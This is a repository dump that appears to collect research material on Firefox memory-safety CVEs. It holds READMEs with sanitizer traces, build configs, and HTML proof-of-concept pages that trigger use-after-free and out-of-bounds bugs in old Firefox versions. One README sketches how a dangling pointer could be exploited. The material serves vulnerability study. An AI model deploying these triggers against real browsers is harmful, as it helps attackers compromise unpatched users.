429 |     <xsl:with-param name="to" select="'&amp;quot;'"/> 
430 |     <xsl:with-param name="string" select="."/>
431 |   </xsl:call-template>
432 |   <xsl:text>"</xsl:text>
433 | </xsl:template>
434 | 
435 | <!-- pis -->
436 | <xsl:template mode="verb" match="processing-instruction()"/>
437 | 
438 | <!-- only works if parser passes on comment nodes -->
439 | <xsl:template mode="verb" match="comment()"/>
440 | 
441 | 
442 | <!-- text elements
443 |      need to replace & and < by entity references-->
444 | <xsl:template mode="verb" match="text()">
445 |   <a name="{generate-id(.)}"/>
446 |   <xsl:call-template name="string-replace">
447 |     <xsl:with-param name="to" select="'&amp;gt;'"/>
448 |     <xsl:with-param name="from" select="'&gt;'"/> 
449 |     <xsl:with-param name="string">
450 |       <xsl:call-template name="string-replace">
451 |         <xsl:with-param name="to" select="'&amp;lt;'"/>
452 |         <xsl:with-param name="from" select="'&lt;'"/> 
453 |         <xsl:with-param name="string">
454 |           <xsl:call-template name="string-replace">
455 |             <xsl:with-param name="to" select="'&amp;amp;'"/>
456 |             <xsl:with-param name="from" select="'&amp;'"/> 
457 |             <xsl:with-param name="string" select="."/>
458 |           </xsl:call-template>
459 |         </xsl:with-param>
460 |       </xsl:call-template>
461 |     </xsl:with-param>
462 |   </xsl:call-template>
463 | </xsl:template>
464 | 
465 | 
466 | <!-- end  verb mode -->
467 | 
468 | <!-- replace all occurences of the character(s) `from'
469 |      by the string `to' in the string `string'.-->
470 | <xsl:template name="string-replace" >
471 |   <xsl:param name="string"/>
472 |   <xsl:param name="from"/>
473 |   <xsl:param name="to"/>
474 |   <xsl:choose>
475 |     <xsl:when test="contains($string,$from)">
476 |       <xsl:value-of select="substring-before($string,$from)"/>
477 |       <xsl:value-of select="$to"/>
478 |       <xsl:call-template name="string-replace">
479 |       <xsl:with-param name="string" select="substring-after($string,$from)"/>
480 |       <xsl:with-param name="from" select="$from"/>
481 |       <xsl:with-param name="to" select="$to"/>
482 |       </xsl:call-template>
483 |     </xsl:when>
484 |     <xsl:otherwise>
485 |       <xsl:value-of select="$string"/>
486 |     </xsl:otherwise>
487 |   </xsl:choose>
488 | </xsl:template>
489 | 
490 | 
491 | <!-- end of verb.xsl -->
492 | 
493 | 
494 | 
495 | <h:h2>IE5XSL stylesheet</h:h2>
496 | <h:p>In a rare fit of sympathy for users of
497 | <h:em>the-language-known-as-XSL-in-IE5</h:em> this file incorporates a
498 | version of the above code designed to work in the Microsoft dialect.
499 | This is needed otherwise users of a MathML rendering behaviour would
500 | have to make a choice whether they wanted to use this stylesheet
501 | (keeping their source documents conforming XHTML+MathML) or to use
502 | the explicit Microsoft Object code, which is less portable, but would
503 | work in at least IE5.5.</h:p>
504 | 
505 | <h:p>This entire section of code, down to the end of the stylesheet is
506 | contained within this ie5:if. Thus XSLT sees it as a top level element
507 | from a foreign namespace and silently ignores it. IE5XSL sees it as
508 | "if true" and so executes the code.</h:p>
509 | 
510 | 
511 | <h:p doc:ref="closecomment">First close the comment started at the beginning. This ensures
512 | that the bulk of the XSLT code, while being copied to the result tree
513 | by the IE5XSL engine, will not be rendered in the browser.</h:p>
514 | 
515 | <h:span doc:ref="eval">Lacking attribute value templates in
516 | xsl:element, and the local-name() function, we resort to constructing
517 | the start and end tags in strings in javascript, then using
518 | no-entities attribute which is the IE5XSL equivalent of disable-output-encoding</h:span>
519 | <ie5:if test=".">
520 | 
521 | <ie5:eval doc:id="closecomment" no-entities="t">'--&gt;'</ie5:eval>
522 | 
523 | <ie5:apply-templates select=".">
524 | 
525 | 
526 | <ie5:script>
527 |     function mpisinstalled() 
528 |     {
529 |     try {
530 |         var ActiveX = new ActiveXObject("MathPlayer.Factory.1");
531 |         return "true";
532 |     } catch (e) {
533 |         return "false";
534 |     }
535 | }
536 | </ie5:script>
537 | 
538 | <ie5:template match="/">
539 | <ie5:apply-templates/>
540 | </ie5:template>
541 | 
542 | <ie5:template match="head|h:head"/>
543 | 
544 | <ie5:template match="text()">
545 | <ie5:value-of select="."/>
546 | </ie5:template>
547 | 
548 | <ie5:template match="*|@*">
549 | <ie5:copy>
550 | <ie5:apply-templates select="*|text()|@*"/>
551 | </ie5:copy>
552 | </ie5:template>
553 | 
554 | 
555 | <ie5:template match="mml:*">
556 | <ie5:eval  no-entities="t" doc:id="eval">'&lt;mml:' + this.nodeName.substring(this.nodeName.indexOf(":")+1)</ie5:eval>
557 | <ie5:for-each select="@*">
558 | <ie5:eval no-entities="t">' ' + this.nodeName</ie5:eval>="<ie5:value-of select="."/>"
559 | </ie5:for-each>
560 | <ie5:eval no-entities="t">'&gt;'</ie5:eval>
561 | <ie5:apply-templates select="*|text()"/>
562 | <ie5:eval no-entities="t">'&lt;/mml:' +  this.nodeName.substring(this.nodeName.indexOf(":")+1) + '&gt;'</ie5:eval>
563 | </ie5:template>
564 | 
565 | 
566 | <ie5:template match="mml:math">
567 | <ie5:if expr="mpisinstalled()=='false'">
568 | <embed  type="text/mathml" height="75" width="300">
569 | <ie5:attribute name="mmldata">
570 | <ie5:eval  doc:id="eval"  no-entities="t">'&lt;math&gt;'</ie5:eval>
571 | <ie5:apply-templates/>
572 | <ie5:eval  doc:id="eval"  no-entities="t">'&lt;/math&gt;'</ie5:eval>
573 | </ie5:attribute>
574 | </embed>
575 | </ie5:if>
576 | <ie5:if expr="mpisinstalled()=='true'">
577 | <ie5:eval  doc:id="eval"  no-entities="t">'&lt;mml:' + this.nodeName.substring(this.nodeName.indexOf(":")+1)</ie5:eval>
578 | <ie5:for-each select="@*">
579 | <ie5:eval no-entities="t">' ' + this.nodeName</ie5:eval>="<ie5:value-of select="."/>"
580 | </ie5:for-each>
581 | <ie5:eval no-entities="t">'&gt;'</ie5:eval>
582 | <ie5:apply-templates select="*|text()"/>
583 | <ie5:eval no-entities="t">'&lt;/mml:' +  this.nodeName.substring(this.nodeName.indexOf(":")+1) + '&gt;'</ie5:eval>
584 | </ie5:if>
585 | </ie5:template>
586 | 
587 | <ie5:template match="html|h:html">
588 | <html   xmlns:mml="http://www.w3.org/1998/Math/MathML">
589 | <head>
590 | <ie5:if expr="mpisinstalled()=='true'">
591 | <object id="mmlFactory"
592 |         classid="clsid:32F66A20-7614-11D4-BD11-00104BD3F987">
593 | </object>
594 | <ie5:pi name="IMPORT">
595 |  namespace="mml" implementation="#mmlFactory"
596 | </ie5:pi>
597 | </ie5:if>
598 | <ie5:apply-templates select="h:head/*|head/*"/>
599 | </head>
600 | <body>
601 | <ie5:apply-templates select="body|h:body"/>
602 | </body>
603 | </html>
604 | </ie5:template>
605 | 
606 | </ie5:apply-templates>
607 | 
608 | 
609 | </ie5:if>
610 | 
611 | 
612 | </xsl:stylesheet>
613 | 


--------------------------------------------------------------------------------
/Firefox/CVE-2018-5100/.DS_Store:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ZihanYe/web-browser-vulnerabilities/ce0cef3971119d7916c7170c3ec377b0b3a000ac/Firefox/CVE-2018-5100/.DS_Store


--------------------------------------------------------------------------------
/Firefox/CVE-2018-5100/README.md:
--------------------------------------------------------------------------------
  1 | # CVE-2018-5100
  2 | 
  3 | ## Description
  4 | 
  5 | A use-after-free vulnerability can occur when arguments passed to the "IsPotentiallyScrollable" function are freed while still in use by scripts. This results in a potentially exploitable crash. This vulnerability affects Firefox < 58.
  6 | 
  7 | ## Firefox
  8 | 
  9 | I tested this vulnerability with Firefox 56.0 ASAN+Fuzzing build. The mozconfig I used is [here](https://github.com/ZihanYe/Firefox-Exploitation/blob/master/Manual%20Exploitation/CVE-2018-5100/mozconfig).
 10 | 
 11 | To build it, I had to downgrade my rust to 1.19.0 according to [Firefox's Rust Update policy](https://wiki.mozilla.org/Rust_Update_Policy_for_Firefox). To do that, install rustup and do ```rustup default 1.19.0```.
 12 | 
 13 | In order for making Firefox opening the PoC file without any other disruption, I used some customized preferences. Preferences can be set in ```about:config``` page in Firefox by searching for preferences listed in [user.js](https://github.com/ZihanYe/Firefox-Exploitation/blob/master/Manual%20Exploitation/CVE-2018-5100/user.js), or if you are running Firefox in headless mode (```--headless```), then create a new profile like this:
 14 | 
 15 | ```
 16 | mkdir -p /path/to/firefox/build/directory/tmp/customized_profile
 17 | ```
 18 | and move [user.js](https://github.com/ZihanYe/Firefox-Exploitation/blob/master/Manual%20Exploitation/CVE-2018-5100/user.js) under the new profile folder.
 19 | 
 20 | Run firefox with options ```--headless --no-remote --profile /path/to/the/profile/folder/just/created file:///path/to/crash.html```
 21 | 
 22 | 
 23 | ## PoC
 24 | 
 25 | The original crash test uses ```FuzzPriv``` extention. However I did not managed to install it. Alternatively, we can use ```FuzzingFunctions``` interface implemented in fuzzing build of Firefox. So instead of triggering GC/CC using the extension, I used
 26 | 
 27 | ```
 28 | FuzzingFunctions.garbageCollect();
 29 | FuzzingFunctions.cycleCollect();
 30 | ```
 31 | 
 32 | ![crash.html](images/crash.png)
 33 | 
 34 | The vulnerability is caused when inside a function ```IsPotentiallyScrollable```, an ```HTMLBodyElement``` is passed in but later freed because of the callback function being triggered.
 35 | 
 36 | ## Where HTMLBodyElement is freed
 37 | 
 38 | In Line 9, getting scrollingElemnent leads to ```nsIDocument::GetScrollingElement()``` in :
 39 | 
 40 | ![](images/image1.png)
 41 | 
 42 | It calls ```nsIDocument::IsPotentiallyScrollable```. The ```HTMLBodyElement``` passed in is the body element associated with ```o259``` in Javascript.
 43 | 
 44 | In ```nsIDocument::IsPotentiallyScrollable```:
 45 | 
 46 | ![](images/image2.png)
 47 | 
 48 | ```FlushPendingNotifications``` is called, in which the callback function ```fun0``` is triggered. In Line 12, writing to ```o259``` causes the old body element being overwritten. So the argument of ```FlushPendingNotifications``` is freed.
 49 | 
 50 | ## Where the dangling pointer is dereferenced
 51 | 
 52 | When returning to ```FlushPendingNotifications``` after callback is executed. We get to Line 10568, which uses the dangling pointer (```aBody```)
 53 | 
 54 | ASAN reports a use-after-free with the following stack trace:
 55 | 
 56 | ```
 57 | READ of size 4 at 0x60d00026a96c thread T0
 58 |     #0 0x7fdd5cbe34cc in nsINode::GetBoolFlag(nsINode::BooleanFlag) const /home/ug16zy2/firefox-56.0/dom/base/nsINode.h:1602:12
 59 |     #1 0x7fdd5cbe34cc in nsINode::IsInUncomposedDoc() const /home/ug16zy2/firefox-56.0/dom/base/nsINode.h:540
 60 |     #2 0x7fdd5cbe34cc in nsIContent::GetPrimaryFrame() const /home/ug16zy2/firefox-56.0/objdir-ff-asan/dist/include/nsIContent.h:911
 61 |     #3 0x7fdd5cbe34cc in mozilla::dom::Element::GetPrimaryFrame() const /home/ug16zy2/firefox-56.0/objdir-ff-asan/dist/include/mozilla/dom/Element.h:1196
 62 |     #4 0x7fdd5cbe34cc in nsIDocument::IsPotentiallyScrollable(mozilla::dom::HTMLBodyElement*) /home/ug16zy2/firefox-56.0/dom/base/nsDocument.cpp:10568
 63 |     #5 0x7fdd5cbe3873 in nsIDocument::GetScrollingElement() /home/ug16zy2/firefox-56.0/dom/base/nsDocument.cpp:10599:18
 64 | ```
 65 | 
 66 | 
 67 | In a debug build: It ends up with a SIGSEGV:
 68 | 
 69 | ```
 70 | Thread 1 "firefox" received signal SIGSEGV, Segmentation fault.
 71 | 0x00007f68fb141449 in nsINode::GetBoolFlag (this=0x0, name=nsINode::IsInDocument)
 72 |     at /home/ug16zy2/firefox-56.0/dom/base/nsINode.h:1602
 73 | 1602	    return mBoolFlags & (1 << name);
 74 | (gdb) info registers
 75 | rax            0x0	0
 76 | rbx            0x558429551e60	94026117488224
 77 | rcx            0x2	2
 78 | rdx            0x20008	131080
 79 | rsi            0x1	1
 80 | rdi            0x0	0
 81 | rbp            0x7ffdf0057cd0	0x7ffdf0057cd0
 82 | rsp            0x7ffdf0057cd0	0x7ffdf0057cd0
 83 | r8             0x8	8
 84 | r9             0x8	8
 85 | r10            0x5584295c37a0	94026117953440
 86 | r11            0x2	2
 87 | r12            0x7ffdf0058750	140728630347600
 88 | r13            0x558426a572b0	94026072421040
 89 | r14            0x7f68fa169ac4	140088849111748
 90 | r15            0x7ffdf005a1f0	140728630354416
 91 | rip            0x7f68fb141449	0x7f68fb141449 <nsINode::GetBoolFlag(nsINode::BooleanFlag) const+15>
 92 | eflags         0x10202	[ IF RF ]
 93 | cs             0x33	51
 94 | ss             0x2b	43
 95 | ds             0x0	0
 96 | es             0x0	0
 97 | fs             0x0	0
 98 | gs             0x0	0
 99 | (gdb) x /16i $rip
100 | => 0x7f68fb141449 <nsINode::GetBoolFlag(nsINode::BooleanFlag) const+15>:
101 |     mov    0x1c(%rax),%edx
102 | ```
103 | 
104 | where at ```0x7f68fb141449```, it tries to read from invalid memory address.
105 | 
106 | 
107 | ## Exploitation
108 | 
109 | If we look at how the dangling pointer could be derefenced after returning from ```FlushPendingNotification```, we can exploit the dangling pointer inside ```IsPotentiallyScrollable```.
110 | 
111 | I presume that alternatively we can craft the new target object so that ```IsPotentiallyScrollable``` returns false and hence ```GetScrollingElement``` returns the dangling pointer, and we get the danling pointer in Javascript and continue with other dereferences.
112 | 


--------------------------------------------------------------------------------
/Firefox/CVE-2018-5100/crash.html:
--------------------------------------------------------------------------------
 1 | <script>
 2 | function start() {
 3 | 	o37=document.createElement('iframe');
 4 | 	document.documentElement.appendChild(o37);
 5 | 	o259=o37.contentDocument;
 6 | 	o290=document.createElement('marquee');
 7 | 	document.documentElement.appendChild(o290);
 8 |  	document.documentElement.addEventListener('DOMAttrModified',fun0);
 9 | 	o259.scrollingElement;
10 | }
11 | function fun0() {
12 | 	o259.write('<div>');
13 | 	FuzzingFunctions.garbageCollect();
14 | 	FuzzingFunctions.cycleCollect();
15 | 	FuzzingFunctions.garbageCollect();
16 | 	FuzzingFunctions.cycleCollect();
17 | 	// fuzzPriv.GC();fuzzPriv.CC();fuzzPriv.GC();fuzzPriv.CC();
18 | }
19 | </script>
20 | <body onload="start()"></body>
21 | 


--------------------------------------------------------------------------------
/Firefox/CVE-2018-5100/images/.DS_Store:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ZihanYe/web-browser-vulnerabilities/ce0cef3971119d7916c7170c3ec377b0b3a000ac/Firefox/CVE-2018-5100/images/.DS_Store


--------------------------------------------------------------------------------
/Firefox/CVE-2018-5100/images/crash.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ZihanYe/web-browser-vulnerabilities/ce0cef3971119d7916c7170c3ec377b0b3a000ac/Firefox/CVE-2018-5100/images/crash.png


--------------------------------------------------------------------------------
/Firefox/CVE-2018-5100/images/image1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ZihanYe/web-browser-vulnerabilities/ce0cef3971119d7916c7170c3ec377b0b3a000ac/Firefox/CVE-2018-5100/images/image1.png


--------------------------------------------------------------------------------
/Firefox/CVE-2018-5100/images/image2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ZihanYe/web-browser-vulnerabilities/ce0cef3971119d7916c7170c3ec377b0b3a000ac/Firefox/CVE-2018-5100/images/image2.png


--------------------------------------------------------------------------------
/Firefox/CVE-2018-5100/mozconfig:
--------------------------------------------------------------------------------
 1 | mk_add_options MOZ_OBJDIR=@TOPSRCDIR@/objdir-ff-asan
 2 | 
 3 | export LLVM_CONFIG="/usr/bin/llvm-config"
 4 | 
 5 | # Enable ASan specific code and build workarounds
 6 | ac_add_options --enable-address-sanitizer
 7 | 
 8 | export CC=/usr/bin/clang
 9 | export CXX=/usr/bin/clang++
10 | 
11 | # Add ASan to our compiler flags
12 | export CFLAGS="-fsanitize=address -Dxmalloc=myxmalloc -fPIC"
13 | export CXXFLAGS="-fsanitize=address -Dxmalloc=myxmalloc -fPIC"
14 | 
15 | export LDFLAGS="-fsanitize=address"
16 | 
17 | # These three are required by ASan
18 | ac_add_options --disable-jemalloc
19 | ac_add_options --disable-crashreporter
20 | ac_add_options --disable-elf-hack
21 | 
22 | # Keep symbols to symbolize ASan traces later
23 | export MOZ_DEBUG_SYMBOLS=1
24 | ac_add_options --enable-debug-symbols
25 | ac_add_options --disable-install-strip
26 | 
27 | ac_add_options --enable-optimize=-O2
28 | ac_add_options --disable-debug
29 | 
30 | ac_add_options --disable-profiling
31 | ac_add_options --enable-tests
32 | 
33 | # fuzzing
34 | ac_add_options --enable-fuzzing
35 | 


--------------------------------------------------------------------------------
/Firefox/CVE-2018-5100/user.js:
--------------------------------------------------------------------------------
 1 | user_pref("browser.shell.checkDefaultBrowser", false);
 2 | user_pref("general.warnOnAboutConfig", false);
 3 | user_pref("fuzzing.enabled", true);
 4 | user_pref("browser.tabs.remote.autostart", false);
 5 | user_pref("browser.tabs.remote.autostart.2", false);
 6 | user_pref("security.sandbox.content.level", 1);
 7 | user_pref("toolkit.startup.max_resumed_crashes", -1);
 8 | user_pref("browser.startup.page", 0);
 9 | user_pref("browser.shell.checkDefaultBrowser", false);
10 | user_pref("browser.sessionstore.resume_from_crash", false);
11 | user_pref("browser.tabs.warnOnOpen", false);
12 | user_pref("browser.tabs.warnOnClose", false);
13 | user_pref("security.insecure_field_warning.contextual.enabled", false);
14 | user_pref("security.insecure_password.ui.enabled", false);


--------------------------------------------------------------------------------
/Firefox/CVE-2018-5102/.DS_Store:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ZihanYe/web-browser-vulnerabilities/ce0cef3971119d7916c7170c3ec377b0b3a000ac/Firefox/CVE-2018-5102/.DS_Store


--------------------------------------------------------------------------------
/Firefox/CVE-2018-5102/README.md:
--------------------------------------------------------------------------------
 1 | # CVE-2018-5102
 2 | 
 3 | ## Description
 4 | heap-use-after-free in mozilla::dom::HTMLMediaElement::NotifyMediaStreamTracksAvailable
 5 | 
 6 | ## Firefox
 7 | 
 8 | I ran it on both Firefox 56.0 and 57.0 build, ASAN reports use-after-free in both cases.
 9 | It needs "--enable-fuzzing" and the FuzzingFunctions interface.
10 | 
11 | ## Poc
12 | 
13 | ![](image1.png)
14 | 
15 | An ```HTMLVideoElement``` (a subclass of ```HTMLMediaElement```) is freed, but still referenced by ```DOMMediaStream```, which invokes ```CheckTracksAvailable()``` and hence the callback function associated with the freed object.
16 | 


--------------------------------------------------------------------------------
/Firefox/CVE-2018-5102/crash.html:
--------------------------------------------------------------------------------
 1 | <script>
 2 | function spin () {
 3 |     var x=new XMLHttpRequest();
 4 |     x.open("POST","https://mozilla.org",false);
 5 |     try{x.send("X");}catch(e){}
 6 | }
 7 | function start() {
 8 | 	o55=document.createElementNS('http://www.w3.org/1999/xhtml','video');
 9 | 	o73=document.createElementNS('http://www.w3.org/1999/xhtml','video');
10 | 	o81=o73.mozCaptureStreamUntilEnded();
11 | 	o55.srcObject=o81;
12 | 	spin();
13 | 	o55=null;
14 | 	o81=null;
15 | 	o73.setAttribute('src','data:video/webm;base64,GkXfowEAAAAAAAAfQoaBAUL3gQFC8oEEQvOBCEKChHdlYm1Ch4ECQoWBAhhTgGcBAAAAAAACfhFNm3RALE27i1OrhBVJqWZTrIHfTbuMU6uEFlSua1OsggEwTbuMU6uEHFO7a1OsggJh7AEAAAAAAACkAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAVSalmAQAAAAAAAEUq17GDD0JATYCNTGF2ZjU2LjQwLjEwMVdBjUxhdmY1Ni40MC4xMDFzpJAI9vs3HzFdyEBxXtVbMzM0RImIQJdwAAAAAAAWVK5rAQAAAAAAADuuAQAAAAAAADLXgQFzxYEBnIEAIrWcg3VuZIaFVl9WUDmDgQEj44OEDuaygOABAAAAAAAABrCBAbqBAR9DtnUBAAAAAAAA3ueBAKOmgQAAgKJJg0IAAAAAAMAHBIODCoAABAAAEb//+UIU3iZw//Z8AACjxIEA+gCkAIBJegCGwAAGIAAAALn///wyA/////7OSv///y4AAKYAQJacAExAAAMgAAAc//+AD////+bR///nIADBIBzBo5uBAfQApgBAlpwATcAAAyAAAAD8//4WX/5f8KCjoIEC7gCmAECWnABNgAADIAAAALn+eD///98F////TgAAo5OBA+gApgEAlpwATWAAAyAAAF5Yo5eBBOIApgBBDpwATSAAAyAAADTN/8gAABxTu2sBAAAAAAAAEbuPs4EAt4r3gQHxggF38IED');
16 | 	o73.play();
17 | 	FuzzingFunctions.garbageCollect();
18 | 	FuzzingFunctions.cycleCollect();
19 | 	FuzzingFunctions.garbageCollect();
20 | 	FuzzingFunctions.cycleCollect();
21 | 	// fuzzPriv.GC();fuzzPriv.CC();fuzzPriv.GC();fuzzPriv.CC();;
22 | }
23 | </script>
24 | <body onload="start()"></body>
25 | 


--------------------------------------------------------------------------------
/Firefox/CVE-2018-5102/image1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ZihanYe/web-browser-vulnerabilities/ce0cef3971119d7916c7170c3ec377b0b3a000ac/Firefox/CVE-2018-5102/image1.png


--------------------------------------------------------------------------------
/Firefox/CVE-2018-5104/.DS_Store:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ZihanYe/web-browser-vulnerabilities/ce0cef3971119d7916c7170c3ec377b0b3a000ac/Firefox/CVE-2018-5104/.DS_Store


--------------------------------------------------------------------------------
/Firefox/CVE-2018-5104/README.md:
--------------------------------------------------------------------------------
 1 | # CVE-2018-5104
 2 | 
 3 | ## Description
 4 | 
 5 | heap-use-after-free in gfxUserFontEntry::DoLoadNextSrc
 6 | 
 7 | ## Firefox
 8 | 
 9 | I tested this vulnerability with Firefox 56.0 ASAN+Fuzzing build.
10 | 
11 | ## PoC
12 | 
13 | The original crash test uses ```FuzzPriv``` extention. However I did not managed to install it. Alternatively, we can use ```FuzzingFunctions``` interface implemented in fuzzing build of Firefox. So instead of triggering GC/CC using the extension, I used
14 | 
15 | ```
16 | FuzzingFunctions.garbageCollect();
17 | FuzzingFunctions.cycleCollect();
18 | ```
19 | 
20 | ![crash.html](images/code.png)
21 | 
22 | The vulnerability is caused because a ```FontFaceSet``` is freed but a ```FontFace``` still keeps a reference to it.
23 | 
24 | ## Where FontFaceSet is freed:
25 | 
26 | After setting ```o585``` and ```o179``` to null, garbage collection collects them.
27 | 
28 | In GDB:
29 | ![](iumaegs/2.png)
30 | 
31 | 
32 | ## Where the dangling pointer is dereferenced
33 | 
34 | In ```FontFace``` object associated with o919, ```mFontFaceSet``` still points to the freed object. ```mozilla::dom::FontFace::Load``` triggers use it:
35 | 
36 | ![](images/3.png)
37 | 


--------------------------------------------------------------------------------
/Firefox/CVE-2018-5104/crash.html:
--------------------------------------------------------------------------------
 1 | <script>
 2 | function spin () {
 3 |     var x=new XMLHttpRequest();
 4 |     x.open("POST","https://mozilla.org",false);
 5 |     try{x.send("X");}catch(e){}
 6 | }
 7 | function start() {
 8 | 	o179=document.cloneNode(true);
 9 | 	o585=o179.fonts;
10 | 	o919=new FontFace('font7',"url('X')");
11 | 	o585.add(o919);
12 |         o585.clear();
13 | 	spin();
14 | 	o585=null;o179=null;
15 | 	// fuzzPriv.GC();fuzzPriv.CC();
16 | 	FuzzingFunctions.garbageCollect();
17 | 	FuzzingFunctions.cycleCollect();
18 | 	o919.load();
19 | }
20 | </script>
21 | <body onload="start()"></body>
22 | 


--------------------------------------------------------------------------------
/Firefox/CVE-2018-5104/images/.DS_Store:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ZihanYe/web-browser-vulnerabilities/ce0cef3971119d7916c7170c3ec377b0b3a000ac/Firefox/CVE-2018-5104/images/.DS_Store


--------------------------------------------------------------------------------
/Firefox/CVE-2018-5104/images/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ZihanYe/web-browser-vulnerabilities/ce0cef3971119d7916c7170c3ec377b0b3a000ac/Firefox/CVE-2018-5104/images/1.png


--------------------------------------------------------------------------------
/Firefox/CVE-2018-5104/images/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ZihanYe/web-browser-vulnerabilities/ce0cef3971119d7916c7170c3ec377b0b3a000ac/Firefox/CVE-2018-5104/images/2.png


--------------------------------------------------------------------------------
/Firefox/CVE-2018-5104/images/3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ZihanYe/web-browser-vulnerabilities/ce0cef3971119d7916c7170c3ec377b0b3a000ac/Firefox/CVE-2018-5104/images/3.png


--------------------------------------------------------------------------------
/Firefox/CVE-2018-5104/images/code.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ZihanYe/web-browser-vulnerabilities/ce0cef3971119d7916c7170c3ec377b0b3a000ac/Firefox/CVE-2018-5104/images/code.png


--------------------------------------------------------------------------------
/Firefox/CVE-2018-5127/.DS_Store:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ZihanYe/web-browser-vulnerabilities/ce0cef3971119d7916c7170c3ec377b0b3a000ac/Firefox/CVE-2018-5127/.DS_Store


--------------------------------------------------------------------------------
/Firefox/CVE-2018-5127/README.md:
--------------------------------------------------------------------------------
 1 | # CVE-2018-5127
 2 | 
 3 | heap-buffer-overflow in DOMSVGPathSegCurvetoCubicAbs
 4 | 
 5 | Version of Firefox I tried: 57.0 (ASAN build)
 6 | 
 7 | 
 8 | ## Crash:
 9 | 
10 | run ```./mach run --debug --disable-e10s ../CVE-2018-5127/crash.html```
11 | 
12 | gives:
13 | 
14 | ```
15 | ==75375==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60600078e634 at pc 0x7ffff6e93733 bp 0x7fffffff0c30 sp 0x7fffffff03d8
16 | READ of size 24 at 0x60600078e634 thread T0
17 |     #0 0x7ffff6e93732  (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x79732)
18 |     #1 0x7fffd36a9749 in mozilla::DOMSVGPathSegCurvetoCubicAbs::DOMSVGPathSegCurvetoCubicAbs(float const*) /home/clover/firefox-57.0/dom/svg/DOMSVGPathSeg.h:363
19 |     #2 0x7fffd36a98c0 in mozilla::DOMSVGPathSegCurvetoCubicAbs::Clone() /home/clover/firefox-57.0/dom/svg/DOMSVGPathSeg.h:363
20 |     #3 0x7fffd36944eb in mozilla::DOMSVGPathSegList::InsertItemBefore(mozilla::DOMSVGPathSeg&, unsigned int, mozilla::ErrorResult&) /home/clover/firefox-57.0/dom/svg/DOMSVGPathSegList.cpp:372
21 | ```
22 | 
23 | Reference:
24 | 
25 | https://bugzilla.mozilla.org/show_bug.cgi?id=1430557
26 | 


--------------------------------------------------------------------------------
/Firefox/CVE-2018-5127/crash.html:
--------------------------------------------------------------------------------
 1 | <html>
 2 | <script>
 3 |         o1035=document.createElementNS('http://www.w3.org/2000/svg','path');
 4 |         o1035.setAttribute('d','M 19 786434 C 7077888 11, 18 98304, 10 94208 z');
 5 |         o1161=o1035.animatedPathSegList;
 6 |         o1189=o1035.createSVGPathSegLinetoVerticalRel(1);
 7 |         o1398=o1161.getItem(1);
 8 |         o1768=o1035.pathSegList;
 9 |         o1768.replaceItem(o1189,1);
10 |         o1768.insertItemBefore(o1189,1);
11 |         o1768.appendItem(o1398);
12 | </script>
13 | 


--------------------------------------------------------------------------------
/Firefox/CVE-2018-5129/README.md:
--------------------------------------------------------------------------------
 1 | # CVE-2018-5129
 2 | 
 3 | ## OOB Write in CopyPlane within ImageContainer.cpp
 4 | 
 5 | **Firefox version verified with:** 57.0 (ASAN build)
 6 | 
 7 | **Type:** OOB Write
 8 | 
 9 | Steps to reproduce:
10 | 
11 | - run ```./mach run --debug --disable-e10s```
12 | 
13 | - open about:config
14 | 
15 | - search for canvas.imagebitmap_extensions.enabled and set it to true
16 | 
17 | - open oob.html
18 | 
19 | 
20 | Reference
21 | 
22 | [1] https://bugzilla.mozilla.org/show_bug.cgi?id=1428947
23 | 
24 | [2] (Write-up) https://infinite.loopsec.com.au/cve-2018-5129-how-i-found-my-first-cve


--------------------------------------------------------------------------------
/Firefox/CVE-2018-5129/oob.html:
--------------------------------------------------------------------------------
 1 | <html>
 2 | <head>
 3 | </head>
 4 | <body>
 5 |     <script>
 6 |         try{
 7 |                 //Represents the Cr.. elements
 8 |                 //Not actually used all that much
 9 |                 vLayout = {
10 |                     offset: 0,
11 |                     width: 4,
12 |                     height: 1,
13 |                     dataType: 'uint8',
14 |                     stride: 1,
15 |                     skip: 0,
16 |                 };
17 | 
18 |                 var src_array = new Uint8Array(0x100000);
19 |                 for(var i = 0; i < src_array.length; i++){
20 |                     src_array[i] = 0x41;
21 |                 }
22 | 
23 |                 //represents our Y elemetns
24 |                 yLayout = {
25 |                         offset: 0,
26 |                         //mData.mYSize:
27 |                         width: 1, //mData.mYSize.width
28 |                         height: 1024, //mData.mYSize.height
29 |                         dataType: 'uint8',
30 |                         stride: 1, //mData.mYStride
31 |                         skip: 1,
32 |                     };
33 | 
34 |                 //Represents the Cb.. elements
35 |                 uLayout = {
36 |                         offset: 0,
37 |                         //mData.mCbCrSize:
38 |                         width: 2048, //mData.mCbCrSize.width
39 |                         //width: target_array_size + 28, //mData.mCbCrSize.width
40 |                         height: 1,  //mData.mCbCrSize.height
41 |                         dataType: 'uint8',
42 |                         stride: 1, //mData.mCbCrStride
43 |                         skip: 1, //we actually want it to overflow such that we can skip 0.
44 |                     };
45 | 
46 |                 bitmap = createImageBitmap(src_array, 0, 1024, 'YUV420P', [yLayout, uLayout, vLayout]);
47 | 
48 |                 console.log(bitmap);
49 | 
50 |                 } catch (ex) {
51 |                         console.log(ex);
52 |                     }
53 | 
54 |     </script>
55 | </body>
56 | 


--------------------------------------------------------------------------------
/Firefox/CVE-2019-11707/.DS_Store:
--------------------------------------------------------------------------------
